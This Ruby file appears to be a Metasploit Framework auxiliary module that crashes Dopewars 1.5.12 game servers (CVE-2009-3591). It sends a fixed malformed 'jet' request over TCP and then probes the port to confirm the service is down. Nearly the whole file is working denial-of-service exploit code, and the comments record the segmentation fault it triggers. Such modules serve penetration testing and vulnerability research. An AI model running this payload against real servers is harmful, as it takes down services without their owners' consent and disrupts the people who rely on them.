rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/misc/dopewars.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'English'
# Auxiliary denial-of-service module for the Dopewars game server
# (CVE-2009-3591, OSVDB 58884, BID 36606).
#
# Per the module description, the jet command in Dopewars 1.5.12 lacks input
# validation and the server segfaults. The module sends one fixed request over
# TCP and then probes the port again to see whether the listener is gone.
#
# Stability is declared as CRASH_SERVICE_DOWN: the service is expected to stay
# down after a successful run until someone restarts it.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the default target port.
  #
  # @param info [Hash] metadata passed in by the framework; merged with the
  #   module's own details through update_info.
  def initialize(info = {})
    module_details = {
      'Name' => 'Dopewars Denial of Service',
      'Description' => %q{
        The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to
        a lack of input validation.
      },
      'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2009-3591' ],
        [ 'OSVDB', '58884' ],
        [ 'BID', '36606' ]
      ],
      'DisclosureDate' => '2009-10-05',
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    }

    super(update_info(info, module_details))

    # 7902 is the default RPORT this module registers; operators can override it.
    register_options([Opt::RPORT(7902)])
  end

  # Sends the crashing request, waits briefly, then reconnects to report
  # whether the service still accepts connections.
  #
  # Only a refused TCP connection is reported as a successful shutdown. Any
  # other connection error raised by the second connect is not rescued here
  # and propagates to the caller.
  def run
    # Debugger output recorded by the module author for the crash in the jet
    # handling:
    #   Program received signal SIGSEGV, Segmentation fault.
    #   [Switching to Thread 0xb74916c0 (LWP 30638)]
    #   0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at
    #   serverside.c:525
    #   525 dopelog(4, LF_SERVER, "%s jets to %s",
    #
    # Fixed request body; reproduced byte-for-byte from the original module.
    crash_request = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
    # Seconds to wait before probing, giving the server time to go down.
    settle_seconds = 2

    connect
    print_status('Sending dos packet...')
    sock.put(crash_request)
    disconnect

    print_status('Checking for success...')
    # select with no descriptors is used as a plain timed wait.
    select(nil, nil, nil, settle_seconds)

    begin
      connect
    rescue ::Interrupt
      # Let a user interrupt pass through untouched.
      raise $ERROR_INFO
    rescue ::Rex::ConnectionRefused
      # Nothing is listening on the port any more.
      print_good('Dopewars server successfully shut down!')
    else
      # The port still accepted a connection, so the service survived.
      print_error('DOS attack unsuccessful')
    ensure
      # Always release the probe socket, whichever branch ran.
      disconnect
    end
  end
end